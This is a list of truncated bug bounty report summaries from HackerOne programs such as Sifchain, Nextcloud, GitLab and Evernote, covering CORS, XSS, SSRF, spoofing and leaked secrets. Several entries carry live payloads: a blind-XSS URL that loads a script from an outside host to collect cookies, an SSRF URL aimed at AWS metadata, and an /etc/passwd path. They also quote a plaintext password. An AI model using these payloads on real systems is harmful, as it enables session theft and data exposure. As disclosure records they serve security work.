U.S. Dept Of Defense: Default Admin Username and Password on █████ Server at █████████mil

Description: A ██████ Server is running at https://███mil you can access the login at https://████mil/█████████ the application is using the default "Administrator for the default organization" credentials POC Go to https://███mil/████████ and login with █████ ██████████ ████ ████ How to remediat...

Sifchain: Clickjacking /framing on sensitive Subdomain

Vulnerability Name : Clickjacking /framing Vulnerability Description : Clickjacking is an interface-based attack in which user is tricked into clicking on actionable content on a hidden website by clicking on some other content in a decoy website . Vulnerable Url :...

Sifchain: Wordpress Users Disclosure (/wp-json/wp/v2/users/) on sifchain.finance

Information: Using REST API, we can see all the WordPress users/author with some of their information. Step To Reproduce: You can get user info by entering below url in your browser: https://www.sifchain.finance/wp-json/wp/v2/users/ Results:...

Nextcloud: Virtual Data Room / Hide download on collabora is easy to bypass

So, let me start with saying I'm not sure if this is a security issue or if it is by design. The reason I'm reporting it here is since Nextcloud promotes this Virtual Data Room a lot...

Sifchain: No Valid SPF Records/don't have DMARC record

Hiii, There is any issue No valid SPF Records on https://sifchain.finance/ Desciprition : There is a email spoofing vulnerability.Email spoofing is the forgery of an email header so that the message appears to have originated from someone or somewhere other than the actual source. Email spoofing ...

Topcoder: Reflected XSS in https://www.topcoder.com/blog/category/community-stories/

Summary: Reflected XSS in https://www.topcoder.com/blog/category/community-stories/ Note: This is a reflected XSS vulnerability in a hidden input. With that vulnerability, an attacker could write his own code on the website. But with this vulnerability, an attacker also could lead a user, to go o...

Sifchain: Wrong implementation of Telegram link on the main page for PC users

Summary: I found that there is a broken link for your telegram group. When a PC user click on telegram icon on your main page he is redirected to tg://resolve?domain=sifchain instead of https://t.me/sifchain due to some errors in configurationcoding. That idea is good for mobile view not deskptop...

Sifchain: CORS Misconfiguration

Summary: An cross-origin resource sharing CORS policy controls whether and how content running on other domains can perform two-way interaction with the domain that publishes the policy. The policy is fine-grained and can apply access controls per-request based on the URL and other features of th...

GitLab: XSS by clicking Jira's link

Summary Since the value of /-/jiraconnect/users?returnto=xxx of xxx is used as a link as it is, it becomes XSS in some browsers. Steps to reproduce 1. Prepare a gitlab environment with no CSP configured e.g. localhost 2. Logged in with safari browser 3. Go to the...

GlassWire: GlassWire 2.1.167 vulnerability - MSVR 56639

Arbitrary code execution vulnerability within the firewall software, GlassWire version 2.1.167 Impact After the program is installed, on first execution, it will attempt to load Wtsapi32.dll.dll from the user's PATH without doing any checks to see if the file is signed. Attached is a demo...

Nextcloud: Scoped apptokens can be changed by that very apptoken

I noticed that there is the possibility to limit apptokens to not be able to access the filesystem. 1. Create a new apptoken in https://server/settings/user/security 2. Click the .. of your new apptoken and make it not allowed to access the filesystem 3. Log out 4. Navigate to...

GitLab: Privilege escalation of "external user" (with maintainer privilege) to internal access through project token

Summary An "external user" a user account with the status external which is granted "Maintainer" role on any project on the GitLab instance where "project tokens" are allowed can elevate its privilege to "Internal". An external user with maintainer permissions could create a project token, which...

Nextcloud: Clients do not verify server public key

So this is related to https://hackerone.com/reports/1189162 but also to your RFC Bear with me because there is going to be some hand waving here and there. Since not everything is implemented yet from your RFC. Right now what happens is:...

GitLab: A deactivated user can access data through GraphQL

Summary A deactivated user should not be able to access information through the API. This rule is not enforced when making requests through the GraphQL endpoint. When reading through the changelog for 13.11.2 i noticed that the rule for a deactivated user allows for :login as it should but it is...

Nextcloud: public webdav endpoint not bruteforce protected

Again related to https://hackerone.com/reports/1173684 I am having some trouble finding the code. However if you do curl -u "RANDOM1:RANDOM2" -X PROPFIND https://server/public.php/webdav And then check your ocbruteforceattempts table. You'll see there is no entry registered. Impact Low just like ...

Sifchain: CORS (Cross-Origin Resource Sharing) origin validation failure

ATTACK DETAILS Access-Control-Allow-Origin: https://sifchain.finance.evil.com Access-Control-Allow-Credentials: true Prefix origins are accepted www.example.com trusts example.com.evil.com Vulnerability Description CORS Cross-Origin Resource Sharing defines a mechanism to enable client-side...

Nextcloud: Add to your nextcloud endpoint is not properly protected

This is related to https://hackerone.com/reports/1173684 The endpoint you hit does have bruteforce protection https://github.com/nextcloud/server/blob/master/apps/federatedfilesharing/lib/Controller/MountPublicLinkController.phpL126 But this is only triggered by finding a share that is password...

Mail.ru: internal path disclosure via error message

Internal path in error message at activate.games.mail.ru...

Sifchain: Email Spoofing on sifchain.finance

Summary: There is an Email Spoofing vulnerability on your domain sifchain.finance which allows an attacker to send an email with your domain namesuch as [email protected] and so on. Steps To Reproduce: Go to http://emkei.cz Fill "From Email" field to [email protected] or any other...

Sifchain: CSRF in newsletter form

Hi, i can perform csrf attack on victim on newsletter to receive updates because you dont have csrf protection "csrf token" in request Request: POST / HTTP/2 Host: sifchain.finance User-Agent: Mozilla/5.0 Windows NT 10.0; Win64; x64; rv:88.0 Gecko/20100101 Firefox/88.0 Accept:...

Vanilla: BlIND XSS on https://open.vanillaforums.com

Hello sir My name is Mohit Kumar and i'm a security researcher i found a bug in your website knows as Blind xss just open this link -- https://open.vanillaforums.com/search?Search=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fhackerookie.xss.ht%3E%3C%2Fscript%3E --- i will recieve your cookies and ip too...

Ruby: XMLRPC does not limit deserializable classes.

Vulnerability description not provided...

Evernote: Full read SSRF in www.evernote.com that can leak aws metadata and local file inclusion

Summary: The following endpoint was found to be vulnerable to SSRF : https://www.evernote.com/ro/aHR0cDovLzE2OS4yNTQuMTY5LjI1NC8jdGVzdC5qcw==/-1430533899.js The endpoint take a path in url and retrieve its content. it is supposed to be use on path but it can be used on URL to get access to intern...

Sifchain: Cross Origin Resource Sharing Misconfiguration | Lead to sensitive information.

hii team, i found a cors bug in your https://sifchain.finance/ website . Steps To Reproduce: 1. goto https://sifchain.finance/ website and enter email and click signup. 2. intercept via burp ,you will get a request . send to repeater. 3.change the request as POST /==wp-json== HTTP/2 Host:...

Sifchain: Social media links not working

Summary: Hey team when i research i found business Logic issue and i will explain to you Steps To Reproduce: POC:- 1. Goto https://sifchain.finance/ 2.Try to add anything after https://sifchain.finance/ 3. Now you will show 404 page not found. 4. Look below in the page you will show links of soci...

Nextcloud: End to end encryption folder locking is not properly protected

I do not see the endtoendencryption app listed here. But since you advertise it big on your website and in communication. And the clients that also support it are covered I assume this is part of the program as well. 1. userA has end to end encryption setup 2. userB wants to annoy userA 3. userB...

Nextcloud: Android app does not clear end to end encryption keys

userA on serverA sets up end to end encryption on their android device 2. userA has some end to end encrypted data 3. userA removes their account on serverA from their android device for whatever reason 4. attacker evil admin obtains the device of userA 5. attacker evil admin logs in on the...

Nextcloud: End to end encryption public key is not properly verified on Desktop and Android

Since last time when I reported something on multiple platforms you seems to prefer handling it in 1 spot. I now just do one. Let me know if You want me to fill separate for android as well. This issue does not seem to happen on iOS as there a test string is encrypted and decrypted, in short...

Sifchain: Information disclosure on Sifchain

Summary: Hello Team, I have found user/admin usernames disclosed. Using REST API, we can see all the WordPress users/authors with some of their information. such as id, name, login name, etc. and employees of Sifchain without authentication on https://sifchain.finance/ Steps To Reproduce: You can...

Sifchain: Found key_adress and key_password in GitHub history

Summary: I found in your GitHub history keyadress and keypasswords Steps To Reproduce: 1. Open url https://github.com/Sifchain/sifnode/commit/f21dcf05c7953693b82bba119bba5ca48982b6d0diff-3b3ced8ca40f67dd52fd8031d9c2b5147c249a8c66b3aa066e355c0ee12fa14c 2. search for "keypassword" and you will find...

Sifchain: Sifchain token leak

Hi Tim sifchain token leak 1=https://github.com/Sifchain/sifnode/blob/955a2450bca2b587d01d7fc0d8feacdf57fbb996/ui/core/src/tokenwhitelist.sifchain-devnet.json 2=https://github.com/Sifchain/sifnode/blob/955a2450bca2b587d01d7fc0d8feacdf57fbb996/ui/core/src/tokenwhitelist.sifchain-testnet.json...

Sifchain: No Valid SPF Records at sifchain.finance

Hello, There is any issue No valid SPF Records Desciprition : There is a email spoofing vulnerability.Email spoofing is the forgery of an email header so that the message appears to have originated from someone or somewhere other than the actual source. Email spoofing is a tactic used in phishing...

Sifchain: CORS Misconfiguration Leads to Sensitive Exposure on Sifchain main domain

Summary: Hello, I know that isn't in the Scope But this The Only Way I can Report With And It Belongs to the Main Domain. ==At first please see all those references given below:== References: https://hackerone.com/reports/768151 https://hackerone.com/reports/1167869...

Sifchain: Username disclosure at Main Domain

Hello, PoC Link https://sifchain.finance//wp-json/wp/v2/users/ thanks. Impact Malicious counterpart could collect the usernames disclosed and the admin user and be focused throughout BF attack as the usernames are now known, making it less harder to penetrate the data.gov systems...

Sifchain: Design Issues at Main Domain

Hello i found design issue at sifchain.finance When we go to this website https://sifchain.finance/hello%20sifchain We get 404 so its normal but if you look at the bottom side of web page you can see the redirects will be broken. F1293150 Impact Content Spoofing...

Sifchain: Vulnerable javascript dependency at Main domain

Hello, Issue detail, Burp observed 1 outdated JavaScript libraries with 4 known vulnerabilities. Burp detected bootstrap version 4.0.0, which has the following vulnerabilities: CVE-2019-8331: XSS in data-template, data-content and data-title properties of tooltip/popover CVE-2018-14041: XSS in...

Sifchain: Vulnerable for clickjacking attack

Summary: Hii Team, I know that I have reported to you outside of Scope. The report is related to the mentioned company and the vulnerability can endanger your business so I report this vulnerability to you. Clickjacking User Interface redress attack, UI redress attack, UI redressing is a maliciou...

Sifchain: Linux Desktop application "sifnoded" executable does not use Pie / no ASLR

Hello Sifchain, sifnoded binary from the Linux application is no position independent executable PoC; $file sifnoded Output will be like ; ███████ Position independent executables are required for full ASLR support on Linux. Non-pie-binaries are loaded to a fixed location, thus allowing ROP...

Sifchain: Wrong Url in Main Page

Hello, There is no linkedin account belonging to the url you added to your homepage and this link can be easily captured by someone else. Misunderstandings may occur. F1293094 https://www.linkedin.com/company/kns-group/about/ Impact Broken Link Hijack...

Sifchain: CORS (Cross-Origin Resource Sharing) origin validation failure -Any website can issue requests made with user credentials and read the responses to th

Welcome! ==In this report I want to describe a high-level bug that can seriously put a user account at risk.== CORS Cross-Origin Resource Sharing defines a mechanism to enable client-side cross-origin requests. This application is using CORS in an insecure way. The web application fails to proper...

Sifchain: A password in plain text in conf file

I found a password in plain text in \sifnode-develop\ui\e2e\config.js in the source code. password: "coolguy21" Impact I don't know actually how does this affects but passwords in plaintexts are always dangerous...

Internet Bug Bounty: "urllib" will result to deny of service

if a client request a http/https/ftp service which is controlled by attacker, attacker can make this client hang forever, event client has set "timeout" argument. maybe this client also will consume more and more memory. i does not test on this conclusion. client.py import urllib.request req =...

Revive Adserver: Reflected XSS on /admin/stats.php

Hi, Security Team! Linked to the reports: - https://hackerone.com/reports/1083376 - https://hackerone.com/reports/1097217 In the past reports, we have corrected Reflected XSS. But recently it turned out that with the parameter breakdown = affiliates, this vulnerability still works. Fixed when...

Sifchain: Dependency Confusion Vulnerability in Sifnode Due to Unclaimed npm Packages.

Summary: Hello, I've found a Dependency Confusion vulnerability in the sifnode project. The vulnerability allows me to claim previously unclaimed npm packages that are being used by the sifnode project, and serve malicious content in them which would allow me to gain remote code execution on anyo...

Sifchain: CORS misconfiguration

Description: Affected website: https://sifchain.finance/wp-json/oembed/1.0/embed?url=https://sifchain.finance/&format=xml Step-by-step Reproduction : 1. Send this request: javascript GET /wp-json/oembed/1.0/embed?url=https://sifchain.finance/&format=xml HTTP/1.1 Host: sifchain.finance...

Sifchain: Email spoofing

Email spoofing is possible To verify: visit :https://www.kitterman.com/spf/validate.html? and type your domain name to check SPF record you can see the results as: NO valid SPF record found POC: 1.visit http://emkei.cz// 2.fill the from email as [email protected] 3.to email as victim email...

Ruby: RCE by parsing `.rdoc_options` in RDoc

The Ruby RDoc library was vulnerable to remote code execution due to improper parsing of the .rdocoptions configuration file. When the RDoc command was executed, the library attempted to load the YAML-formatted .rdocoptions file, which allowed for the instantiation of arbitrary classes and the...

Ruby: XSS in HTML generated by RDoc

Vulnerability description not provided...

Sifchain: wrong url in hackerone > goes to wix.com > unconnected

Summary: Hi there, this is a very small issue out of scope. Your current domain name in your hackerone program is wrong: http://sifchain.finance and moves to wix.com Steps To Reproduce: 1. Login as a researcher 2. Open the program from sifchain: https://hackerone.com/sifchain?type=team 3. click o...

Reddit: critical file found etc/passwd on www.reddit.com

1.go to this link https://www.reddit.com/etc%2fpasswd 2.youll find all the etc/passwd files this data should be protected. 3.these passwd can be used for many illegal purpose and can damage the comapny poc attched: HTTP/2 200 OK Content-Type: text/plain; charset=UTF-8 X-Ua-Compatible: IE=edge...